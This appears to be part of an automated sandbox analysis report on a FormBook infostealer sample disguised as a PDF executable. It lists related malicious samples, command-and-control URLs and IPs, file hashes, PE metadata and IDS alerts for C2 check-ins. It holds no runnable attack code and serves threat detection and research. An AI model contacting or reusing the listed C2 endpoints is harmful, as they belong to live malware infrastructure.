                                                                                                            • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.070002018.xyz/6m2n/
                                                                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.030002613.xyz/xd9h/
                                                                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.030002449.xyz/cfqm/
                                                                                                            PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                                            • www.070001955.xyz/7zj0/
                                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.54248711.xyz/jm2l/
                                                                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.030002613.xyz/xd9h/
                                                                                                            Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.070002018.xyz/6m2n/
                                                                                                            43.199.54.158ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.327531.buzz/iyce/
                                                                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.327531.buzz/zoqm/
                                                                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • www.327531.buzz/zoqm/
                                                                                                            154.23.184.95New Order.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.hm35s.top/tb3j/
                                                                                                            file.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.hm35s.top/lazq/
                                                                                                            Maryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/nv0k/
                                                                                                            shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/1bs4/
                                                                                                            fHkdf4WB7zhMcqP.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/x8cs/
                                                                                                            SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/1bs4/
                                                                                                            icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/x8cs/
                                                                                                            DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/rj0s/
                                                                                                            DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.wcp95.top/rj0s/
                                                                                                            COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.hm23s.top/jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            www.327531.buzzek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 43.199.54.158
                                                                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 43.199.54.158
                                                                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 43.199.54.158
                                                                                                            www.vayui.topRFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.95.160
                                                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 172.67.145.234
                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 104.21.95.160
                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 172.67.145.234
                                                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 172.67.145.234
                                                                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                            • 104.21.95.160
                                                                                                            bg.microsoft.map.fastly.netZiraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 199.232.210.172
                                                                                                            qWMEdD3xsu.dllGet hashmaliciousStrela StealerBrowse
                                                                                                            • 199.232.210.172
                                                                                                            IDqDMIZDPk.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            c2.htaGet hashmaliciousXWormBrowse
                                                                                                            • 199.232.210.172
                                                                                                            9MQYWJVQut.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdfGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Payment Remittance Advice Details.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            Dec_2024 Shipment Packing List.vbsGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                            • 199.232.210.172
                                                                                                            Payment Advice-Dec-2024.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.210.172
                                                                                                            https://cdn.iobit.com/dl/driver_booster_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 199.232.214.172
                                                                                                            s-part-0035.t-0009.t-msedge.netTKuVlZfZngP6kV3.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 13.107.246.63
                                                                                                            SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 13.107.246.63
                                                                                                            original.emlGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            6J523vK0ft.dllGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            8IwJiLDCIR.dllGet hashmaliciousStrela StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 13.107.246.63

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            LILLY-ASUSloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 40.8.14.133
                                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.189.184.29
                                                                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.116.24.188
                                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.67.246.81
                                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 43.95.151.18
                                                                                                            2.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 43.201.56.76
                                                                                                            https://omantel.om.points-mall.me/en/Get hashmaliciousUnknownBrowse
                                                                                                            • 43.156.70.231
                                                                                                            jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 40.16.60.113
                                                                                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 43.139.177.79
                                                                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 40.183.20.22
                                                                                                            CLOUDFLARENETUSSOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.34.183
                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.34.183
                                                                                                            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • 162.159.129.233
                                                                                                            ltT8eZaqtZ.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                                            • 172.67.216.167
                                                                                                            htZgRRla8S.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.206.64
                                                                                                            0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.185.252
                                                                                                            https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 104.21.112.1
                                                                                                            http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                                                                                            • 104.17.159.113
                                                                                                            https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                                                            • 104.18.20.58
                                                                                                            COGENT-174USloligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.195.126.207
                                                                                                            loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 149.16.70.227
                                                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.253.65.24
                                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 206.149.94.248
                                                                                                            loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 38.167.77.142
                                                                                                            6400_output.vbsGet hashmaliciousDucktailBrowse
                                                                                                            • 38.255.42.40
                                                                                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 149.103.6.242
                                                                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 149.113.171.18
                                                                                                            AI#U667a#U80fd.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 206.119.80.40
                                                                                                            AI#U667a#U80fd.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 206.119.80.40
                                                                                                            CONTABODEORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.142.144
                                                                                                            Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            New quotation request.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245
                                                                                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                            • 167.86.111.146
                                                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                                                            • 161.97.168.245

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ3978 39793980.pdf.exe.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                            C:\Users\user\AppData\Local\Temp\7-6E2al6

                                                                                                            Download File
                                                                                                            Process:C:\Windows\SysWOW64\regini.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.7109338967318575
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            File name:RFQ3978 39793980.pdf.exe
                                                                                                            File size:861'696 bytes
                                                                                                            MD5:3979572152f3fb2b98211eeb761309af
                                                                                                            SHA1:67e622f51e4c1f128ac003e2132b26a87a582a6d
                                                                                                            SHA256:7f3a6082c0ab2b881863c4dfe7328ef497155d2d962fa4a1976a5c26ec1d4e66
                                                                                                            SHA512:8b9db4fa7f51f98372f5fb31960d7fe75d5913c9c941f60df8c02a71642ce324a7120a359641e51205a6a3a791dbbf5f0c59877cde36eb5f1a2fea610aec3c38
                                                                                                            SSDEEP:24576:0jlIhSPd+pz5yOA07B73WHJhiO0ZlzxXvhFNI:0jl+SPspzJA09TDHPvhF
                                                                                                            TLSH:D105D0C03B2A7701DEACB934853AEDB862641E78B00479F37EDD2B57B6D90126A1CF54
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......$........... ... ....@.. ....................................@................................

                                                                                                            File Icon

                                                                                                            Icon Hash:37c38329a3924d33

                                                                                                            Static PE Info

                                                                                                            General

                                                                                                            Entrypoint:0x4d1fe2
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x675AC199 [Thu Dec 12 10:57:29 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                            Entrypoint Preview

                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add eax, dword ptr [eax]
                                                                                                            add eax, dword ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            sub byte ptr [eax], al
                                                                                                            add byte ptr [eax+0000000Eh], al
                                                                                                            pop eax
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            mov byte ptr [eax], al
                                                                                                            add byte ptr [eax+00000000h], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [eax], eax
                                                                                                            add dword ptr [eax], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            inc eax
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [eax], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            mov eax, 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [ecx], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jnle 00007F52E904FBA2h
                                                                                                            add byte ptr [eax+00h], dh
                                                                                                            add byte ptr [eax+00000000h], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [eax], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            call 00007F52E904FBC3h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [ecx], al
                                                                                                            add byte ptr [ecx], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+00800000h], ah
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al

                                                                                                            Data Directories

                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xd1f900x4f.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x21e0.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                            Sections

                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x20000xcffe80xd0000a29244549ad0db181660cbb89bcb3904False0.8906660813551682data7.712373186885482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rsrc0xd20000x21e00x2200951f1f744f0f03e5e3414146ae638455False0.9306066176470589data7.619913047886231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .reloc0xd60000xc0x20072d48b126301d8ea59e08064101efd3cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                            Resources

                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_ICON0xd20c80x1e1fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9939048113085203
                                                                                                            RT_GROUP_ICON0xd3ef80x14data1.05
                                                                                                            RT_VERSION0xd3f1c0x2c0data0.4616477272727273

                                                                                                            Imports

                                                                                                            DLLImport
                                                                                                            mscoree.dll_CorExeMain

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-12T21:48:14.890184+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449793104.21.95.16080TCP
                                                                                                            2024-12-12T21:48:31.978767+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44982943.199.54.15880TCP
                                                                                                            2024-12-12T21:48:31.978767+01002856318ETPRO MALWARE FormBook CnC Checkin (POST) M41192.168.2.44982943.199.54.15880TCP
                                                                                                            2024-12-12T21:48:34.636274+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44983543.199.54.15880TCP
                                                                                                            2024-12-12T21:48:37.313787+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44984143.199.54.15880TCP
                                                                                                            2024-12-12T21:49:00.394420+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44985243.199.54.15880TCP
                                                                                                            2024-12-12T21:49:07.463159+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449913154.88.22.10580TCP
                                                                                                            2024-12-12T21:49:10.119468+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449923154.88.22.10580TCP
                                                                                                            2024-12-12T21:49:12.801205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449930154.88.22.10580TCP
                                                                                                            2024-12-12T21:49:15.562392+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449936154.88.22.10580TCP
                                                                                                            2024-12-12T21:49:22.697579+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449952154.23.184.9580TCP
                                                                                                            2024-12-12T21:49:25.372601+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449959154.23.184.9580TCP
                                                                                                            2024-12-12T21:49:28.058440+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449967154.23.184.9580TCP
                                                                                                            2024-12-12T21:49:30.751909+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449973154.23.184.9580TCP
                                                                                                            2024-12-12T21:49:37.743891+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449990161.97.142.14480TCP
                                                                                                            2024-12-12T21:49:40.369735+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449997161.97.142.14480TCP
                                                                                                            2024-12-12T21:49:42.990482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450004161.97.142.14480TCP
                                                                                                            2024-12-12T21:49:45.654891+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450012161.97.142.14480TCP
                                                                                                            2024-12-12T21:49:52.512820+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002566.29.149.4680TCP
                                                                                                            2024-12-12T21:49:55.206949+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002666.29.149.4680TCP
                                                                                                            2024-12-12T21:49:57.911741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002766.29.149.4680TCP
                                                                                                            2024-12-12T21:50:00.513086+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002866.29.149.4680TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 12, 2024 21:46:49.400512934 CET49675443192.168.2.4173.222.162.32
                                                                                                            Dec 12, 2024 21:46:59.009798050 CET49675443192.168.2.4173.222.162.32
                                                                                                            Dec 12, 2024 21:48:13.517837048 CET4979380192.168.2.4104.21.95.160
                                                                                                            Dec 12, 2024 21:48:13.638714075 CET8049793104.21.95.160192.168.2.4
                                                                                                            Dec 12, 2024 21:48:13.639497042 CET4979380192.168.2.4104.21.95.160
                                                                                                            Dec 12, 2024 21:48:13.648102045 CET4979380192.168.2.4104.21.95.160
                                                                                                            Dec 12, 2024 21:48:13.768024921 CET8049793104.21.95.160192.168.2.4
                                                                                                            Dec 12, 2024 21:48:14.889898062 CET8049793104.21.95.160192.168.2.4
                                                                                                            Dec 12, 2024 21:48:14.890084028 CET8049793104.21.95.160192.168.2.4
                                                                                                            Dec 12, 2024 21:48:14.890131950 CET8049793104.21.95.160192.168.2.4
                                                                                                            Dec 12, 2024 21:48:14.890183926 CET4979380192.168.2.4104.21.95.160
                                                                                                            Dec 12, 2024 21:48:14.890218019 CET4979380192.168.2.4104.21.95.160
                                                                                                            Dec 12, 2024 21:48:14.894447088 CET4979380192.168.2.4104.21.95.160
                                                                                                            Dec 12, 2024 21:48:15.015503883 CET8049793104.21.95.160192.168.2.4
                                                                                                            Dec 12, 2024 21:48:30.340815067 CET4982980192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:30.460969925 CET804982943.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:30.461159945 CET4982980192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:30.473103046 CET4982980192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:30.593213081 CET804982943.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:31.978766918 CET4982980192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:32.141798019 CET804982943.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:32.997087002 CET4983580192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:33.116945982 CET804983543.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:33.118105888 CET4983580192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:33.129990101 CET4983580192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:33.249881029 CET804983543.199.54.158192.168.2.4
